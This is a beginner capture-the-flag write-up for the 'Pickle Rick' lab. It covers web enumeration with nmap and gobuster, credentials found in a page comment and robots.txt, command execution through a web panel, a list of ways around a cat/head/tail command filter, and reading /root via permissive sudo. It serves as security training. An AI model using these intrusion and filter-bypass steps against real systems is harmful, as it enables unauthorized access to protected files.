Pickle Rick

beginner35 minWriteup

Help Rick find his ingredients

Learning Objectives

  • Enumerate the web app
  • Find credentials
  • Exploit web vulnerabilities
  • Find all ingredients

Pickle Rick is a Rick and Morty themed CTF where you help Rick find three secret ingredients. It teaches web enumeration, command injection, and basic Linux navigation.

Walkthrough

bash
1606070;"># Step 1: Scan and Web Enum
2nmap -sV TARGET_IP
3606070;"># Port 80 HTTP
4 
5606070;"># View page source
6curl http:606070;">//TARGET_IP | grep -i "comment|username|password"
7606070;"># Found comment: Username: R1ckRul3s
8 
9606070;"># Check robots.txt
10curl http:606070;">//TARGET_IP/robots.txt
11606070;"># Contains: Wubbalubbadubdub (password!)
12 
13606070;"># Step 2: Directory Enumeration
14gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
15606070;"># Found: /login.php
16 
17606070;"># Step 3: Login
18606070;"># Username: R1ckRul3s
19606070;"># Password: Wubbalubbadubdub
20 
21606070;"># Step 4: Command Injection
22606070;"># The portal has a command panel!
23606070;"># Commands are executed on the server
24 
25606070;"># First ingredient (in current dir)
26ls
27606070;"># Found: Sup3rS3cretPickl3Ingred.txt
28 
29606070;"># Some commands are blocked (cat, head, tail)
30606070;"># Use alternatives:
31less Sup3rS3cretPickl3Ingred.txt
32606070;"># Or: grep . Sup3rS3cretPickl3Ingred.txt
33606070;"># First ingredient found!
34 
35606070;"># Step 5: Find Second Ingredient
36ls /home
37606070;"># Found: rick, ubuntu
38 
39ls /home/rick
40606070;"># Found: second ingredients
41 
42less 606070;">#a5d6ff;">"/home/rick/second ingredients"
43606070;"># Second ingredient found!
44 
45606070;"># Step 6: Find Third Ingredient
46606070;"># Check sudo permissions
47sudo -l
48606070;"># User can run ALL commands!
49 
50sudo ls /root
51606070;"># Found: 3rd.txt
52 
53sudo less /root/3rd.txt
54606070;"># Third ingredient found!

Bypass Command Filters

When cat is blocked, try: less, more, head, tail, grep, awk, sed, strings, xxd, base64, or even python/php to read files.

Knowledge Check

Quick Quiz
Question 1 of 1

Where was the username found?

Key Takeaways

  • Always view page source and check for comments
  • robots.txt can contain sensitive information
  • When commands are blocked, use alternatives
  • sudo -l can reveal overly permissive configurations